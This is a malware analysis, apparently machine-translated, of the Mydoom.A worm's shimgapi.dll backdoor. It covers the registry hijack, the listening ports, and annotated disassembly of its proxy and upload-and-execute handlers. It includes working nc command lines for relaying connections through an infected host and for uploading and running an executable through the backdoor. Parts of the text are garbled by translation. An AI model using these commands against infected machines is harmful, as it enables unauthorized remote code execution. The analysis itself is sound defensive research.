Analysis of shimgapi. dll of Mydoom.

The backdoor of Mydoom. A exists as a DLL. By modifying the corresponding key value of the registry, you can load yourself into the process space of the resource manager.

Under normal circumstances, the Registry should look like this:
Hkey_classes_root/CLSID/{E6FB5E20-DE35-11CF-9C87-00AA005127ED}/inprocserver32
<No Name> reg_expand_sz % SystemRoot %/system32/webcheck. dll
Threadingmodel REG_SZ apartment

Mydoom. A replaces % SystemRoot %/system32/webcheck. dll with its own shimgapi. dll.

By default, the shimgapi. dll backdoor listens to port 3127. If the port is occupied, it increases progressively, but not greater than 3198.

The backdoor provides two functions:
1. Act as a port forwarding proxy
2. As a backdoor, the receiver uploads and executes the program

Related code:
. Text: 7e1a1c44 sub_7e1a1c44 proc near; Data xref: Start + 19O
. Text: 7e1a1c44
. Text: 7e1a1c44 wsadata = wsadata PTR-190 h
. Text: 7e1a1c44
. Text: 7e1a1c44 sub ESP, 190 h
. Text: 7e1a1c4a push ESI
. Text: 7e1a1c4b push EDI
. Text: 7e1a1c4c call sub_7e1a1a1f
. Text: 7e1a1c51 Lea eax, [esp + 198 h + wsadata]
. Text: 7e1a1c55 push eax; lpwsadata
. Text: 7e1a1c56 push 2; wversionrequested
. Text: 7e1a1c58 call DS: wsastartup
. Text: 7e1a1c5e call address
. Text: 7e1a1c63 mov EDI, DS: Sleep
. Text: 7e1a1c69 mov ESI, 0c37h; listening on port 3127
. Text: 7e1a1c6e
. Text: 7e1a1c6e loc_7e1a1c6e:; Code xref: sub_7e1a1c44 + 50j
. Text: 7e1a1c6e Push 3
. Text: 7e1a1c70 push ESI
. Text: 7e1a1c71 call sub_7e1a1b52; Bind subroutine
. Text: 7e1a1c76 pop ECx
. Text: 7e1a1c77 pop ECx
. Text: 7e1a1c78 pushing 400 h; dwmilliseconds
. Text: 7e1a1c7d call EDI; sleep
. Text: 7e1a1c7f cmp esi, 0c7eh; port no greater than 3198
. Text: 7e1a1c85 jle short loc_7e1a1c93
. Text: 7e1a1c87 push 800 H; dwmilliseconds
. Text: 7e1a1c8c call EDI; sleep
. Text: 7e1a1c8e mov ESI, 0c37h
. Text: 7e1a1c93
. Text: 7e1a1c93 loc_7e1a1c93:; Code xref: sub_7e1a1c44 + 41j
. Text: 7e1a1c93 Inc ESI; If the port is greater than 3198, 1 is subtracted and bind again
. Text: 7e1a1c94 JMP short loc_7e1a1c6e
. Text: 7e1a1c94 sub_7e1a1c44 endp

After port 3127 receives the connection, if the first character of the Recv is/x04, the transfer-in port forwarding process --> determines whether the second character is 0x01 --> gets 5th ~ Use eight or four characters as the destination IP address --> use three or four characters as the destination port --> connect and forward data with the current socket

For example, we use/x00/x6e/xc0/xA8/x01/x0b as the connection command, where/x00/x6e is port 110, /xc0/xA8/x01/x0b is 192.168.1.11.

# Printf/x04/x01/x00/x6e/xc0/xA8/x01/x0b/x00 | NC 192.168.7.33 3127
Z + OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

We can see that the session sent to port 110 of 192.168.1.11 is switched back. Note that a section of data is included before the returned characters. Test again:

# Printf/x04/x01/x00/x6e/xc0/xA8/x01/x0b/x00 | NC 192.168.7.33 3127 | xxd-G 1
0000000: 04 5A 00 6e C0 A8 01 0b 2B 4f 4B 20 4D 69 63 72. Z. N... + OK MICR
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53 osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 33 20 50 4f 50 33 20 erver 2003 POP3
0000030: 73 65 72 76 72 20 76 65 72 73 69 6f 6e 20 36 server version 6
0000040: 2E 35 2E 36 39 34 34 2E 30 20 28 64 63 2E 69 6e. 5.6944.0

Try to send the command to connect to port 98 that does not exist:
# Printf/x04/x01/x00/x62/xc0/xA8/x01/x0b/x00 | NC 192.168.7.33 3127 | xxd-G 1
0000000: 04 5B 00 62 C0 A8 01 0b. [. B ....

Obviously, that piece of data indicates the connection status. 04 5A indicates that the connection is successful, and 04 5B indicates that the connection fails. The following is the connection Command sent in the past. This feature may be designed by the worm author to facilitate client judgment.

Related code:
. Text: 7e1a17f5
. Text: 7e1a17f5 loc_7e1a17f5:; Code xref: sub_7e1a17ba + 2bj
. Text: 7e1a17f5 CMP byte PTR [ebp-1], 4; compare whether the first character is 0x04
. Text: 7e1a17f9 push EBX
. Text: 7e1a17fa jnz loc_7e1a18b7; if the first character is not 0x04, transfer and exit
. Text: 7e1a1800 xor ebx, EBX
. Text: 7e1a1802
. Text: 7e1a1802 loc_7e1a1802:; Code xref: sub_7e1a17ba + 65j
. Text: 7e1a1802 push 0; flags
. Text: 7e1a1804 push 8
. Text: 7e1a1806 pop eax
. Text: 7e1a1807 sub eax, EBX
. Text: 7e1a1809 push eax; Len
. Text: 7e1a180a Lea eax, [EBP + EBX + Buf]
. Text: 7e1a180e push eax; Buf
. Text: 7e1a180f push [EBP + S]; S
. Text: 7e1a1812 call ESI; Recv
. Text: 7e1a1814 test eax, eax
. Text: 7e1a1816 JL short loc_7e1a1823
. Text: 7e1a1818 JZ short loc_7e1a1825
. Text: 7e1a181a add EBX, eax
. Text: 7e1a181c cmp ebx, 8; the number of characters received is less than 8.
. Text: 7e1a181f JL short loc_7e1a1802; Continue Recv if the number of accepted characters is not enough
. Text: 7e1a1821 JMP short loc_7e1a1825
. Text: 7e1a1823; where where?
. Text: 7e1a1823
. Text: 7e1a1823 loc_7e1a1823:; Code xref: sub_7e1a17ba + 5cj
. Text: 7e1a1823 mov EBX, eax
. Text: 7e1a1825
. Text: 7e1a1825 loc_7e1a1825:; Code xref: sub_7e1a17ba + 5ej
. Text: 7e1a1825; sub_7e1a17ba + 67j
. Text: 7e1a1825 cmp ebx, 8
. Text: 7e1a1828 jnz loc_7e1a1907
. Text: 7e1a182e JMP short loc_7e1a1836
. Text: 7e1a1830; where where?
. Text: 7e1a1830
. Text: 7e1a1830 loc_7e1a1830:; Code xref: sub_7e1a17ba + 8cj
. Text: 7e1a1830 CMP [EBP + var_2], 0; compare whether the characters after 8 characters are 0x00, that is, whether only 8 characters are sent
. Text: 7e1a1834 JZ short loc_7e1a184a
. Text: 7e1a1836
. Text: 7e1a1836 loc_7e1a1836:; Code xref: sub_7e1a17ba + 74j
. Text: 7e1a1836 push 0
. Text: 7e1a1838 Lea eax, [EBP + var_2]
. Text: 7e1a183b Push 1
. Text: 7e1a183d push eax
. Text: 7e1a183e push [EBP + S]
. Text: 7e1a1841 call ESI
. Text: 7e1a1843 CMP eax, 1
. Text: 7e1a1846 JZ short loc_7e1a1830
. Text: 7e1a1848 JMP short loc_7e1a18b7
. Text: 7e1a184a; where where?
. Text: 7e1a184a
. Text: 7e1a184a loc_7e1a184a:; Code xref: sub_7e1a17ba + 7aj
. Text: 7e1a184a CMP [EBP + Buf], 4; Judge again whether the first character is 0x04
. Text: 7e1a184e jnz short loc_7e1a18b7
. Text: 7e1a1850 CMP byte PTR [ebp-0Fh], 1; judge whether the second character is 0x01, if yes, continue, no, exit
. Text: 7e1a1854 jnz short loc_7e1a18b7
. Text: 7e1a1856 CMP [EBP + hostlong], 0; Determine whether the last four characters (IP addresses) are all 0
. Text: 7e1a185a JZ short loc_7e1a187c
. Text: 7e1a185c push [EBP + hostlong]; hostlong
. Text: 7e1a185f call DS: htonl
. Text: 7e1a1865 test eax, 0ffffff00h; check whether the input IP address is 255.255.255.0
. Text: 7e1a186a jnz short loc_7e1a187c
. Text: 7e1a186c push [EBP + S]
. Text: 7e1a186f Lea EBX, [EBP + hostlong]
. Text: 7e1a1872 call sub_7e1a1664
. Text: 7e1a1877 test eax, eax
. Text: 7e1a1879 pop ECx
. Text: 7e1a187a jnz short loc_7e1a18b7
. Text: 7e1a187c
. Text: 7e1a187c loc_7e1a187c:; Code xref: sub_7e1a17ba + a0j
. Text: 7e1a187c; sub_7e1a17ba + b0j
. Text: 7e1a187c mov ax, [ebp-0Eh]; take the first two characters, as the port
. Text: 7e1a1880 push 6; Protocol
. Text: 7e1a1882 mov word PTR [EBP + name. sa_data], ax
. Text: 7e1a1886 mov eax, [EBP + hostlong]
. Text: 7e1a1889 Push 1; Type
. Text: 7e1a188b push 2; af
. Text: 7e1a188d mov [EBP + name. sa_family], 2
. Text: 7e1a1893 mov dword ptr [EBP + name. sa_data + 2], eax
. Text: 7e1a1896 call DS: Socket
. Text: 7e1a189c CMP eax, 0 ffffffffh
. Text: 7e1a189f mov [EBP + var_8], eax
. Text: 7e1a18a2 JZ short loc_7e1a18b7
. Text: 7e1a18a4 Lea eax, [EBP + name]
. Text: 7e1a18a7 push 10 h; namelen
. Text: 7e1a18a9 push eax; Name
. Text: 7e1a18aa push [EBP + var_8]; S
. Text: 7e1a18ad call DS: connect
. Text: 7e1a18b3 test eax, eax
. Text: 7e1a18b5 JZ short loc_7e1a18d2
. Text: 7e1a18b7
. Text: 7e1a18b7 loc_7e1a18b7:; Code xref: sub_7e1a17ba + 40j
. Text: 7e1a18b7; sub_7e1a17ba + 8ej...
. Text: 7e1a18b7 push 0; flags
. Text: 7e1a18b9 Lea eax, [EBP + Buf]
. Text: 7e1a18bc push 8; Len
. Text: 7e1a18be push eax; Buf
. Text: 7e1a18bf push [EBP + S]; S
. Text: 7e1a18c2 mov [EBP + Buf], 4
. Text: 7e1a18c6 mov byte PTR [ebp-0Fh], 5bh; connection failed, return 0x5b
. Text: 7e1a18ca call DS: Send
. Text: 7e1a18d0 JMP short loc_7e1a18f8
. Text: 7e1a18d2; where where?
. Text: 7e1a18d2
. Text: 7e1a18d2 loc_7e1a18d2:; Code xref: sub_7e1a17ba + FBJ
. Text: 7e1a18d2 push 0; flags
. Text: 7e1a18d4 Lea eax, [EBP + Buf]
. Text: 7e1a18d7 push 8; Len
. Text: 7e1a18d9 push eax; Buf
. Text: 7e1a18da push [EBP + S]; S
. Text: 7e1a18dd mov [EBP + Buf], 4
. Text: 7e1a18e1 mov byte PTR [ebp-0Fh], 5ah; connection successful, return 0x5a
. Text: 7e1a18e5 call DS: Send
. Text: 7e1a18eb push [EBP + var_8]
. Text: 7e1a18ee push [EBP + S]
. Text: 7e1a18f1 call sub_7e1a16d3
. Text: 7e1a18f6 pop ECx
. Text: 7e1a18f7 pop ECx

If the Recv contains 1st characters:/xqq --> 2nd ~ The five characters are/xpp --> Accept all data starting from the sixth character and save it as a temporary folder --> CreateProcess --> after the program exits, delete a program.

That is to say, as long as we add the header of any executable file with five characters:/xqq/xpp, and send the data to the infected Mydoom. port 3127 of the worm machine A. The file will be executed on the system. I added the magic-head to the system calculator program with ultraedit and sent it to NC.

# Xxd-G 1-l 64 calc.exe
0000000: QQ pp 4D 5A 90 00 00 00 00 00 04 00 00 ...... MZ .........
0000010: 00 ff 00 00 B8 00 00 00 00 00 40 00 00 .............@..
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

# NC 192.168.7.33 3127 <calc.exe
^ C

Related code:

Omitted